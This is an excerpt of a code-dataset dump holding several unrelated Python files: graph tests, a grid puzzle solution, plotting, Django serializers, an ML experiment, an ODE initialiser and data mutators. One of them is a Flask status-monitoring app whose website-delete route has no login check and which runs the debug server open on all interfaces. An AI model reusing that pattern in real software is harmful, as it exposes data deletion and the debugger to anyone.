learn_rate=0.7)\n    g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n    g6.learn_edge(triple=(('NEURON', '1'), ('NN', None, None), ('NEURON', '3')), learn_rate=0.7)\n\n    g7 = AMGraph(directional=True)\n    g7.set_edge(triple=(('TRADE', '1'), ('HAS_PLATFORM', None, None), ('PLATFORM', 'A')))\n    g7.set_edge(triple=(('TRADE', '1'), ('HAS_DATE', None, None), ('DATE', '22-11-66')))\n    g7.set_edge(triple=(('PLATFORM', 'A'), ('HAS_CHANNEL', None, None), ('CHANNEL', 'Electronic')))\n\n    sub_graphs = g7.get_sub_graphs()\n\n    sub_graphs_g = g7.get_sub_graphs(generalise=True)\n\n    g8 = AMGraph()\n    g8.set_node(node=('NEURON', '1'), a_graph=g3n1)\n\n    jg8n = g8.to_dict()\n    jg8dn = g8.to_dict(denormaliser=normaliser)\n\n    g9 = AMGraph()\n    g9.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=200)\n\n    stm = AMGraph(graph=g9)\n    ltm = AMGraph(graph=g9)\n\n    g10 = AMGraph()\n    g10.set_edge(triple=(('TRADE', '*'), ('HAS_VOLUME', None, None), ('VOLUME', 'TRADE')), numeric=100)\n\n    stm.learn_graph(graph_to_learn=g10, learn_rate=0.7)\n    ltm.learn_graph(graph_to_learn=g10, learn_rate=0.4)\n\n    dg = AMGraph(graph=stm)\n    dg.diff_graph(graph_to_diff=ltm)\n    dg.rename_triples(postfix_edge_uid='lstm')\n\n    dg.merge_graph(graph_to_merge=g10, 
weight=1.0)\n\n\n print('finished')\n","sub_path":"src/am_graph.py","file_name":"am_graph.py","file_ext":"py","file_size_in_byte":35777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"97447355","text":"import sys\n\nM, N = map(int, sys.stdin.readline().strip().split())\n\nmaps = []\nfor _ in range(M):\n maps.append(list(sys.stdin.readline().strip()))\n\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0, 0]\n\n\ndef find(i, j):\n for k in range(4):\n if i + dx[k] < 0 or i + dx[k] >= M:\n continue\n if j + dy[k] < 0 or j + dy[k] >= N:\n continue\n\n cur = maps[i + dx[k]][j + dy[k]]\n if cur == 'S':\n print(0)\n exit()\n elif cur in ['W', 'D']:\n continue\n else:\n maps[i + dx[k]][j + dy[k]] = 'D'\n\n\nfor i in range(M):\n for j in range(N):\n if maps[i][j] == 'W':\n find(i, j)\n\nprint(1)\nfor m in maps:\n print(''.join(m))\n","sub_path":"backjoon/Graph/16956_늑대와_양.py","file_name":"16956_늑대와_양.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394230226","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright 2017 D. de Vries\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nThis file contains the definition of the `BaseLanePlotter` class.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nimport abc\nfrom abc import abstractmethod\n\nimport matplotlib.colors as colors\nimport numpy as np\nfrom matplotlib import ticker as ticker\nfrom matplotlib.figure import Figure\nfrom openmdao.core.driver import Driver\nfrom typing import Optional\n\nfrom .base_iteration_plotter import BaseIterationPlotter\n\n\nclass BaseLanePlotter(BaseIterationPlotter):\n \"\"\"Specialized `BaseIterationPlotter` wrapping a ``lane plot`` style visualization of variables.\n\n Abstract base class enabling OpenMDAO data to be visualized using colored, horizontal lanes. Each variable to be\n visualized this way has its own lane. The x-axis corresponds to the number of iterations/function evaluations. 
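# The wolf/sheep grid check above (16956) scans the four orthogonal neighbours
# of each cell with paired offset arrays plus bounds checks. The same idiom in
# isolation, on a toy grid:
grid = ['.S.', 'SW.', '...']
rows, cols = len(grid), len(grid[0])
dx, dy = [0, 0, 1, -1], [1, -1, 0, 0]

for i in range(rows):
    for j in range(cols):
        if grid[i][j] != 'W':
            continue
        for k in range(4):
            ni, nj = i + dx[k], j + dy[k]
            if 0 <= ni < rows and 0 <= nj < cols:
                print(f'wolf at ({i},{j}) sees {grid[ni][nj]!r} at ({ni},{nj})')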
A\n colorbar is used to indicate the value of a design variable.\n\n Attributes\n ----------\n n_vars : int\n The number variables.\n\n var_names : :obj:`list` of :obj:`str`\n List of all variable names.\n\n xs, ys, cs: :obj:`np.ndarray`\n Arrays containing the x-, y-, and color data of the figure.\n\n iter : int\n Number of the last iteration.\n\n ax : :obj:`Axes`\n Matplotlib `Axes` of the plot.\n\n max_iter : int\n Maximum number of iterations.\n\n quad : :obj:`matplotlib.collections.QuadMesh`\n Instance of `QuadMesh` that represents the actual plot.\n\n vmin, vmax : float\n Lower and upper cutoff for values along the colorbar.\n\n cmap : str\n Name of the colormap to use.\n\n norm : :obj:`colors.Normalize`, optional\n Which normalization scheme to use for the colorbar.\n \"\"\"\n __metaclass__ = abc.ABCMeta\n\n def __init__(self, vmin=0., vmax=1., cmap='viridis', norm=None):\n # type: (float, float, str, Optional[colors.Normalize]) -> None\n \"\"\"Initialize a new `BaseLanePlotter` instance.\n\n Parameters\n ----------\n vmin, vmax : float\n Lower and upper cutoff for the values along the colorbar.\n\n cmap : str('viridis')\n Name of the colormap to use for the plot.\n\n norm : :obj:`colors.Normalize`, optional\n Instance of `colors.Normalize` can be supplied to use a normalization scheme for the colorbar.\n \"\"\"\n super(BaseLanePlotter, self).__init__()\n\n self.n_vars = None\n self.var_names = None\n\n self.xs = None\n self.ys = None\n self.cs = None\n\n self.iter = 0\n self.ax = None\n self.max_iter = 1000\n\n self.quad = None\n\n self.vmin = vmin\n self.vmax = vmax\n self.cmap = cmap\n self.norm = norm\n\n def startup(self, object_requesting_recording):\n # type: (Driver) -> None\n \"\"\"Make sure this `Recorder` is attached to a `Driver` and obtain the maximum number of iterations.\n\n Parameters\n ----------\n object_requesting_recording : :obj:`Driver`\n Instance of `Driver` to which this `Recorder` is attached.\n \"\"\"\n if not isinstance(object_requesting_recording, Driver):\n raise ValueError('This Recorder should be attached to a Driver.')\n\n if 'maxiter' in object_requesting_recording.options:\n self.max_iter = object_requesting_recording.options['maxiter']\n\n super(BaseLanePlotter, self).startup(object_requesting_recording)\n\n @abstractmethod\n def init_vars(self):\n # type: () -> None\n \"\"\"Initialize the variables of the plot.\n\n This method should be implemented by subclasses such that they can control how variables are initialized.\n \"\"\"\n raise NotImplementedError\n\n def init_fig(self, fig):\n # type: (Figure) -> None\n \"\"\"Initialize the figure, setting up axes, labels, the colorbar, etc.\n\n Parameters\n ----------\n fig : :obj:`Figure`\n Instance of the `Figure` which should be populated.\n \"\"\"\n self.init_vars()\n\n self.xs, self.ys = np.meshgrid(np.arange(0., self.max_iter+.5)-.5, np.arange(0., self.n_vars+.5)-.5)\n self.cs = np.zeros((self.n_vars, self.max_iter))\n\n self.ax = fig.add_subplot(111)\n self.ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))\n self.ax.yaxis.set_ticks(np.arange(0, self.n_vars))\n self.ax.yaxis.set_ticklabels(self.var_names)\n\n self.ax.set_xlim([-.5, .5])\n self.ax.set_ylim([-.5, self.n_vars-.5])\n self.quad = self.ax.pcolormesh(self.xs, self.ys, self.cs,\n vmin=self.vmin, vmax=self.vmax, cmap=self.cmap, norm=self.norm)\n\n fig.colorbar(self.quad)\n\n self.ax.set_xlabel('Evaluation #')\n\n @abstractmethod\n def _compute_new_data(self, desvars, responses, objectives, constraints, metadata):\n # type: (dict, 
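# init_fig above builds the lane plot from a meshgrid one cell larger than the
# colour matrix plus a pcolormesh; _update_plot later refreshes it in place via
# set_array. A self-contained sketch with dummy data (Agg backend so it runs
# headless; the file name is illustrative):
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np

n_vars, max_iter = 3, 10
xs, ys = np.meshgrid(np.arange(0., max_iter + .5) - .5, np.arange(0., n_vars + .5) - .5)
cs = np.zeros((n_vars, max_iter))

fig, ax = plt.subplots()
quad = ax.pcolormesh(xs, ys, cs, vmin=0., vmax=1., cmap='viridis')
fig.colorbar(quad)
ax.set_yticks(np.arange(n_vars))
ax.set_yticklabels(['x0', 'x1', 'x2'])
ax.set_xlabel('Evaluation #')

cs[:, 0] = np.random.rand(n_vars)   # new column of data for iteration 0
quad.set_array(cs.ravel())          # refresh the existing mesh in place
fig.savefig('lanes.png')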
dict, dict, dict, dict) -> np.ndarray\n \"\"\"Return a 1D numpy.ndarray containing the new data points.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n\n Returns\n -------\n np.ndarray\n A 1D numpy array containing the new data.\n \"\"\"\n raise NotImplementedError\n\n def _update_plot(self, *args):\n # type: (dict, dict, dict, dict, dict) -> None\n \"\"\"Insert the new data into the plot and refresh it.\n\n Parameters\n ----------\n desvars, responses, objectives, constraints, metadata : dict\n Dictionaries of the new design, response, objective, and constraint variables, as well as metadata.\n \"\"\"\n if len(args) != 5 and not any([isinstance(arg, dict) for arg in args]):\n raise ValueError('Illegal arguments for _update_plot of %s' % self.__name__)\n desvars, responses, objectives, constraints, metadata = args\n\n data = self._compute_new_data(desvars, responses, objectives, constraints, metadata)\n self.cs[:, self.iter] = data[:]\n self.quad.set_array(self.cs.ravel())\n self.ax.set_xlim([-.5, self.iter+.5])\n self.iter += 1\n","sub_path":"openlego/recorders/base_lane_plotter.py","file_name":"base_lane_plotter.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"365485417","text":"#!/usr/bin/python3.5\n# coding: utf-8\n\n\"\"\"\n\n Author : github/TonyChg\n Purpose :\n Usage :\n Example :\n\n\"\"\"\n\nimport urllib\nimport requests\nimport mysql.connector\nimport threading\nfrom database import Database\n\nfrom passlib.hash import argon2\nfrom flask import Flask, render_template, g, redirect, \\\n url_for, request, abort, session\n\nfrom status import Status\nfrom datetime import datetime\n\ntry:\n app = Flask(__name__)\n app.config.from_object('config')\n database = Database(\n app.config['DATABASE_HOST'],\n app.config['DATABASE_USER'],\n app.config['DATABASE_PASSWORD'],\n app.config['DATABASE_NAME']\n )\nexcept Exception as e:\n print(e)\n print(\"Fail to start. 
exiting\")\n exit(1)\n\ndef validate_url(url):\n try:\n result = urllib.parse.urlparse(url)\n if result.scheme != 'http' and result.scheme != 'https':\n raise ValueError\n return True\n except:\n return False\n\ndef request_to_dict(keys):\n entity = []\n for key in keys:\n entity.append((key, request.form.get(key)))\n return dict(entity)\n\ndef human_timestamp(timestamp):\n time = datetime.strptime(str(timestamp), \"%Y-%m-%d %H:%M:%S\")\n delta = datetime.now() - time\n formattime = \"\"\n\n if hasattr(delta, 'hours'):\n formattime += \"{} h\".format(delta.hours)\n if hasattr(delta, 'minutes'):\n formattime += \"{} m\".format(delta.minutes)\n if hasattr(delta, 'seconds'):\n formattime += \"{} s\".format(delta.seconds)\n print(formattime)\n return formattime\n\ndef authenticate_user():\n try:\n user = request_to_dict(['email', 'password'])\n\n if not user['email'] or not user['password']:\n raise Exception('Invalid form.')\n find_user = database.find_user_by_email(user['email'])\n\n if not find_user or not argon2.verify(user['password'], find_user[1]):\n raise Exception('Invalid crendentials')\n else:\n print(\"Authenticated user: {}\".format(find_user[0]))\n session['logged_user'] = find_user[0]\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('login.html', message=e)\n\n@app.route('/admin/delete/website/', methods=[\"GET\"])\ndef delete_website(website_id):\n try:\n find_website = database.fetch_one_website(website_id)\n if not find_website[0]:\n raise Exception('Invalid website id.')\n database.delete_website(find_website[0])\n return redirect(url_for('admin'))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/create/website', methods=['GET', 'POST'])\ndef create_website():\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n if request.method == 'GET':\n return render_template('create_website.html')\n try:\n website = request_to_dict(['url', 'title'])\n if not website['url']:\n raise Exception('Invalid form.')\n if not validate_url(website['url']):\n raise Exception('Invalid url.')\n database.create_website(website)\n return redirect(url_for('admin'))\n except Exception as e:\n return render_template('create_website.html', message=e.args[0])\n\n@app.route('/admin/websites//delete/status')\ndef delete_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n database.delete_status(website_id)\n return redirect(url_for('show_status', website_id=website_id))\n except Exception as e:\n abort(404)\n\n@app.route('/admin/websites/')\ndef show_status(website_id):\n if not session.get('logged_user'):\n return redirect(url_for('connection'))\n try:\n website = database.fetch_one_website(website_id)\n status = database.fetch_status_by_website(website_id)\n return render_template('show_status.html', website=website, status=status)\n except Exception as e:\n abort(404)\n\n@app.route('/disconnect')\ndef disconnect():\n if session['logged_user']:\n session.clear()\n return redirect(url_for('index'))\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/admin')\ndef admin():\n try:\n user = session['logged_user']\n websites = database.fetch_all_websites()\n return render_template('admin.html', websites=websites)\n except Exception as e:\n return redirect(url_for('connection'))\n\n@app.route('/login', methods=['GET', 'POST'])\ndef connection():\n if request.method == 'GET':\n return render_template('login.html')\n else:\n return 
authenticate_user()\n\nif __name__ == '__main__':\n status = Status(name=\"Status Watchers\")\n status.start()\n app.run(threaded=True, debug=True, use_reloader=False, host='0.0.0.0')\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"471452875","text":"from rest_framework import serializers\nfrom .models import BasicProduct, SoldBasicProduct\nfrom ..customAuth.serializers import SafeUserDataSerializer\n\n\nclass BasicProductSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BasicProduct\n fields = ('id', 'title', 'slug', 'active', 'price')\n\n extra_kwargs = {\n 'id': {'read_only': True},\n 'slug': {'read_only': True},\n }\n\n\nclass SoldBasicProductSerializer(serializers.ModelSerializer):\n url = serializers.HyperlinkedIdentityField(\n lookup_field='id',\n view_name=\"basic-product:sold-basic-product-detail\",\n read_only=True\n )\n\n basic_product = serializers.HyperlinkedRelatedField(\n read_only=True,\n lookup_field='slug',\n view_name='basic-product:basic-product-detail'\n )\n\n sold_to = serializers.SerializerMethodField()\n\n class Meta:\n model = SoldBasicProduct\n fields = [\n 'id', 'url', 'basic_product', 'price', 'sold_to',\n ]\n\n def get_sold_to(self, obj):\n return SafeUserDataSerializer(obj.sold_to).data\n","sub_path":"code/sNeeds/apps/basicProducts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584092120","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. module:: size_of_data_set_incremental_experiment\n :platform: Unix, Windows\n :synopsis: This module contains an abstract class used to conduct \n the first sub experiment of the preliminary experiment \n of the thesis. The experiment consists mainly of trying \n to find the optimal number of bug reports that should \n be used to train a classifier. In the context of the \n first sub experiment, all the folds, except the oldest \n one, are used to evaluate the performance of the \n classifier (cf. Master's Thesis). \n\n.. 
moduleauthor:: Daniel Artchounin \n\n\n\"\"\"\n\nimport numpy as np\nimport abc\nimport os\nimport inspect\n\ncurrent_dir = os.path.dirname(os.path.abspath( \\\ninspect.getfile(inspect.currentframe())))\nos.sys.path.insert(0, current_dir)\nfrom sub_exp_of_preliminary_exp_launcher \\\nimport SubExpOfPreliminaryExpLauncher\n \nclass SubExp1OfPreliminaryExpLauncher(SubExpOfPreliminaryExpLauncher):\n \n @abc.abstractmethod\n def __init__(self, data_set_file, developers_dict_file, \\\n developers_list_file):\n super().__init__(data_set_file, developers_dict_file, \\\n developers_list_file)\n self._type = \"incremental\"\n \n def _yield_indices_for_learning_curve(self, K=33):\n super()._yield_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n yield np.asarray(range(indices[j], indices[i])), \\\n np.asarray(range(indices[i], indices[i+1]))\n \n def _generate_list_indices_for_learning_curve(self, K=33):\n super()._generate_list_indices_for_learning_curve(K)\n number_of_instances = self._X.shape[0]\n indices = super()._custom_linspace(0, number_of_instances, K+1)\n train_indices = []\n test_indices = []\n for i in range(len(indices)-2, 0, -1):\n for j in range(i):\n train_indices.append(list(range(indices[j], indices[i])))\n test_indices.append(list(range(indices[i], indices[i+1])))\n return train_indices, test_indices \n \n def plot_or_save_learning_curve(self, K=33, save_file=True):\n super().plot_or_save_learning_curve(K, save_file)","sub_path":"src/preliminary_experiment/sub_exp_1_of_preliminary_exp_launcher.py","file_name":"sub_exp_1_of_preliminary_exp_launcher.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"257849216","text":"\"\"\"Runge-Kutta initialisation.\"\"\"\n\n\nfrom typing import Optional\n\nimport numpy as np\nimport scipy.integrate as sci\n\nfrom probnum import filtsmooth, problems, randprocs, randvars\nfrom probnum.diffeq.odefilter.initialization_routines import _initialization_routine\nfrom probnum.typing import FloatArgType\n\n\nclass RungeKuttaInitialization(_initialization_routine.InitializationRoutine):\n r\"\"\"Initialize a probabilistic ODE solver by fitting the prior process to a few steps of an approximate ODE solution computed with Scipy's Runge-Kutta methods.\n\n Parameters\n ----------\n dt\n Maximum step-size to use for computing the approximate ODE solution. The smaller, the more accurate, but also, the smaller, the less stable.\n The best value here depends on the ODE problem, and probably the chosen method. Optional. Default is ``1e-2``.\n method\n Which solver to use. This is communicated as a string that is compatible with ``scipy.integrate.solve_ivp(..., method=method)``.\n Optional. Default is `DOP853`.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from probnum.randvars import Normal\n >>> from probnum.problems.zoo.diffeq import vanderpol\n >>> from probnum.randprocs.markov.integrator import IntegratedWienerProcess\n\n Compute the initial values of the van-der-Pol problem as follows.\n First, we set up the ODE problem and the prior process.\n\n >>> ivp = vanderpol()\n >>> print(ivp.y0)\n [2. 
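# The incremental scheme above trains on a window of consecutive older folds
# and tests on the next fold, for every window ending at every fold boundary.
# A sketch of the same index generation, assuming K (roughly) equal folds:
import numpy as np

def incremental_folds(n: int, K: int):
    bounds = np.linspace(0, n, K + 1, dtype=int)
    for i in range(K - 1, 0, -1):
        for j in range(i):
            yield np.arange(bounds[j], bounds[i]), np.arange(bounds[i], bounds[i + 1])

for train, test in incremental_folds(12, 4):
    print(train.tolist(), '->', test.tolist())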
0.]\n >>> prior_process = IntegratedWienerProcess(initarg=ivp.t0, num_derivatives=3, wiener_process_dimension=2)\n\n Next, we call the initialization routine.\n\n >>> rk_init = RungeKuttaInitialization()\n >>> improved_initrv = rk_init(ivp=ivp, prior_process=prior_process)\n >>> print(prior_process.transition.proj2coord(0) @ improved_initrv.mean)\n [2. 0.]\n >>> print(np.round(improved_initrv.mean, 1))\n [ 2. 0. -2. 58.2 0. -2. 60. -1745.7]\n >>> print(np.round(np.log10(improved_initrv.std), 1))\n [-13.8 -11.3 -9. -1.5 -13.8 -11.3 -9. -1.5]\n \"\"\"\n\n def __init__(\n self, dt: Optional[FloatArgType] = 1e-2, method: Optional[str] = \"DOP853\"\n ):\n self.dt = dt\n self.method = method\n super().__init__(is_exact=False, requires_jax=False)\n\n def __call__(\n self,\n ivp: problems.InitialValueProblem,\n prior_process: randprocs.markov.MarkovProcess,\n ) -> randvars.RandomVariable:\n \"\"\"Compute the initial distribution.\n\n For Runge-Kutta initialization, it goes as follows:\n\n 1. The ODE integration problem is set up on the interval ``[t0, t0 + (2*order+1)*h0]``\n and solved with a call to ``scipy.integrate.solve_ivp``. The solver is uses adaptive steps with ``atol=rtol=1e-12``,\n but is forced to pass through the\n events ``(t0, t0+h0, t0 + 2*h0, ..., t0 + (2*order+1)*h0)``.\n The result is a vector of time points and states, with at least ``(2*order+1)``.\n Potentially, the adaptive steps selected many more steps, but because of the events, fewer steps cannot have happened.\n\n 2. A prescribed prior is fitted to the first ``(2*order+1)`` (t, y) pairs of the solution. ``order`` is the order of the prior.\n\n 3. The value of the resulting posterior at time ``t=t0`` is an estimate of the state and all its derivatives.\n The resulting marginal standard deviations estimate the error. This random variable is returned.\n\n Parameters\n ----------\n ivp\n Initial value problem.\n prior_process\n Prior Gauss-Markov process.\n\n Returns\n -------\n Normal\n Estimated (improved) initial random variable. 
Compatible with the specified prior.\n \"\"\"\n f, y0, t0, df = ivp.f, ivp.y0, ivp.t0, ivp.df\n y0 = np.asarray(y0)\n ode_dim = y0.shape[0] if y0.ndim > 0 else 1\n order = prior_process.transition.num_derivatives\n\n # order + 1 would suffice in theory, 2*order + 1 is for good measure\n # (the \"+1\" is a safety factor for order=1)\n num_steps = 2 * order + 1\n t_eval = np.arange(t0, t0 + (num_steps + 1) * self.dt, self.dt)\n sol = sci.solve_ivp(\n f,\n (t0, t0 + (num_steps + 1) * self.dt),\n y0=y0,\n atol=1e-12,\n rtol=1e-12,\n t_eval=t_eval,\n method=self.method,\n )\n\n # Measurement model for SciPy observations\n proj_to_y = prior_process.transition.proj2coord(coord=0)\n zeros_shift = np.zeros(ode_dim)\n zeros_cov = np.zeros((ode_dim, ode_dim))\n measmod_scipy = randprocs.markov.discrete.LTIGaussian(\n proj_to_y,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Measurement model for initial condition observations\n proj_to_dy = prior_process.transition.proj2coord(coord=1)\n if df is not None and order > 1:\n proj_to_ddy = prior_process.transition.proj2coord(coord=2)\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy, proj_to_ddy))\n initial_data = np.hstack((y0, f(t0, y0), df(t0, y0) @ f(t0, y0)))\n else:\n projmat_initial_conditions = np.vstack((proj_to_y, proj_to_dy))\n initial_data = np.hstack((y0, f(t0, y0)))\n zeros_shift = np.zeros(len(projmat_initial_conditions))\n zeros_cov = np.zeros(\n (len(projmat_initial_conditions), len(projmat_initial_conditions))\n )\n measmod_initcond = randprocs.markov.discrete.LTIGaussian(\n projmat_initial_conditions,\n zeros_shift,\n zeros_cov,\n proc_noise_cov_cholesky=zeros_cov,\n forward_implementation=\"sqrt\",\n backward_implementation=\"sqrt\",\n )\n\n # Create regression problem and measurement model list\n ts = sol.t[:num_steps]\n ys = list(sol.y[:, :num_steps].T)\n ys[0] = initial_data\n measmod_list = [measmod_initcond] + [measmod_scipy] * (len(ts) - 1)\n regression_problem = problems.TimeSeriesRegressionProblem(\n observations=ys, locations=ts, measurement_models=measmod_list\n )\n\n # Infer the solution\n kalman = filtsmooth.gaussian.Kalman(prior_process)\n out, _ = kalman.filtsmooth(regression_problem)\n estimated_initrv = out.states[0]\n return estimated_initrv\n","sub_path":"src/probnum/diffeq/odefilter/initialization_routines/_runge_kutta.py","file_name":"_runge_kutta.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"606611295","text":"import collections\n\nimport numpy as np\nimport pandas as pd\n\nfrom typing import List, Callable, Union, Sequence\n\nMutator = Callable[[pd.DataFrame], pd.DataFrame]\n\n\ndef mutate_baselines(baseline_datas: List[pd.DataFrame],\n baselines_mutators: List[Mutator],\n inplace_mutations: Union[bool, Sequence[bool]] = True) -> List[pd.DataFrame]:\n \"\"\"\n Mutates the inputted baselines using the mutators.\n A mutation can be either inplace or create a new mutated version of each baselines in addition to the original\n This is done using the sequence inplace_mutations - for each mutator if the boolean in the same position within\n the sequence is True the mutation will be inplace, and if False the mutation will create a copy.\n If inplace_mutations is a single boolean, it will be treated as if all mutators have that value\n\n :param baseline_datas: the baselines to mutate\n :param 
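# The call above leans on scipy.integrate.solve_ivp with tight tolerances and
# an explicit t_eval grid, so the first few samples are dense enough to fit
# the prior. A stripped-down version of that call on a toy ODE (dt and the
# step count are illustrative):
import numpy as np
import scipy.integrate as sci

f = lambda t, y: -y                      # toy ODE: y' = -y
t0, dt, num_steps = 0.0, 1e-2, 7
t_eval = np.arange(t0, t0 + (num_steps + 1) * dt, dt)

sol = sci.solve_ivp(f, (t0, t0 + (num_steps + 1) * dt), y0=np.array([1.0]),
                    atol=1e-12, rtol=1e-12, t_eval=t_eval, method='DOP853')
print(sol.t[:3], sol.y[0, :3])           # dense early samples for the fit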
baselines_mutators: the mutators to use - each will be used an all baselines\n :param inplace_mutations: marks which mutators will be inplace and which will create copies\n :return: a list of all mutated baselines (can contain both inplace and new mutations)\n \"\"\"\n if isinstance(inplace_mutations, collections.Sequence):\n assert len(inplace_mutations) == len(baselines_mutators), \"inplace specifications must match number of mutators\"\n else:\n inplace_mutations: List[bool] = [inplace_mutations] * len(baselines_mutators)\n\n mutated_baselines = [baseline_data.copy() for baseline_data in baseline_datas]\n\n for mutator, is_inplace_mutation in zip(baselines_mutators, inplace_mutations):\n if is_inplace_mutation:\n mutated_baselines = [mutator(baseline_data) for baseline_data in mutated_baselines]\n else:\n mutated_baselines += [mutator(baseline_data) for baseline_data in mutated_baselines]\n\n return mutated_baselines\n\n\ndef mult_baseline_sizes_mutation(mult: int, baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n multiplies the total amount of bytes and packets by a constant integer\n :param mult: the multitude by which the sizes will be multiplied\n :param baseline_data: the baseline to be mutated\n :return: a copy of the data with the sizes multiplied by the constant\n \"\"\"\n mutated_baseline = baseline_data.copy()\n mutated_baseline[['total_bytes', 'num_packets']] *= mult\n return mutated_baseline\n\n\ndef sizes_mult_mutator(mult: int) -> Mutator:\n \"\"\"\n creates a mutation method of `mult_baseline_sizes_mutation` with the inputted value\n :param mult: the constant the `mult_baseline_sizes_mutation` will use\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: mult_baseline_sizes_mutation(mult, baseline_data)\n\n\ndef shuffle_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n shuffle the indices of a baseline randomly\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with the indices (protocols) shuffled\n \"\"\"\n shuffled_indices: list = baseline_data.index.to_numpy().tolist()\n np.random.shuffle(shuffled_indices)\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=shuffled_indices)\n\n\ndef switch_2_protocols_mutation(baseline_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n switches the indices of 2 randomly chosen rows in the baseline\n :param baseline_data: the baseline to mutate\n :return: a copy of the baseline with 2 rows' indices being switched\n \"\"\"\n indices: list = baseline_data.index.to_numpy().tolist()\n\n idx_to_switch = np.random.choice(np.arange(len(indices)), size=2, replace=False)\n indices[idx_to_switch[0]], indices[idx_to_switch[1]] = indices[idx_to_switch[1]], indices[idx_to_switch[0]]\n\n return pd.DataFrame(baseline_data.to_numpy(), columns=baseline_data.columns, index=indices)\n\n\ndef change_values_by_x_percent_mutation(baseline_data: pd.DataFrame, mutation_percentage: float,\n features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> pd.DataFrame:\n \"\"\"\n randomly changes the features of a baseline randomly by at most mutation_percentage,\n only in the protocols and features specified.\n Each value will that will be changed will be multiplied by a random number in the range (1-X, 1+X),\n When X is the mutation percentage\n :param baseline_data: the baseline to mutate\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the 
features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the baseline randomly changed\n \"\"\"\n if features_to_change is None:\n features_to_change = baseline_data.columns.to_numpy().tolist()\n\n if protocols_to_change is None:\n protocols_to_change = baseline_data.index.to_numpy().tolist()\n\n rand_vals = pd.DataFrame(\n np.random.uniform(1 - mutation_percentage, 1 + mutation_percentage, size=baseline_data.to_numpy().shape),\n columns=baseline_data.columns, index=baseline_data.index)\n\n # set features and protocols that should not be changed to be multiplied by 1\n rand_vals[list(set(rand_vals.columns).difference(features_to_change))] = 1.0\n rand_vals.loc[list(set(rand_vals.index).difference(protocols_to_change))] = 1.0\n\n mutated_data = baseline_data * rand_vals\n for col in mutated_data.columns:\n mutated_data[col] = mutated_data[col].astype(baseline_data[col].dtype)\n\n return mutated_data\n\n\ndef rand_by_x_percent_mutator(mutation_percentage: float, features_to_change: List[str] = None,\n protocols_to_change: List[str] = None) -> Mutator:\n \"\"\"\n Returns a `change_values_by_x_percent_mutation` with the inputted percentage, features and protocols\n :param mutation_percentage: the max percentage by which the mutated values can change from the original\n :param features_to_change: the features to be changed randomly. by default all features are changed\n :param protocols_to_change: the protocols to be changed randomly. by default all protocols are changed\n :return: the mutation method\n \"\"\"\n return lambda baseline_data: change_values_by_x_percent_mutation(baseline_data, mutation_percentage,\n features_to_change, protocols_to_change)\n\n\n__all__ = [\n 'Mutator',\n 'mutate_baselines',\n 'mult_baseline_sizes_mutation',\n 'sizes_mult_mutator',\n 'shuffle_protocols_mutation',\n 'switch_2_protocols_mutation',\n 'change_values_by_x_percent_mutation',\n 'rand_by_x_percent_mutator',\n]\n","sub_path":"ReinforcementLearning/mutators.py","file_name":"mutators.py","file_ext":"py","file_size_in_byte":6861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 